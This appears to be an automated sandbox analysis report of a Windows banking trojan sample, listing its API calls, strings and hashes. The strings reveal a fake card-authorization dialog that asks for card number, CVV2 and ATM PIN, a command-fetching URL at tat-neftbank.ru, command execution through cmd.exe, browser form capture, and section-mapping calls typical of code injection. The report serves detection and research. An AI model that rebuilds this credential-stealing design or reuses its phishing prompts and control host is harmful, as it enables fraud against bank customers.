                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D

                            Control-flow Graph

                             • Graph: entry block 40570c-405743 (call 4079e4, GetTempPathA), a chain of strcat/sprintf/rand blocks 40574d-405b85, and final block 405b88-405c08 (strcat, CreateFileA, lstrlenA, WriteFile, CloseHandle)
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
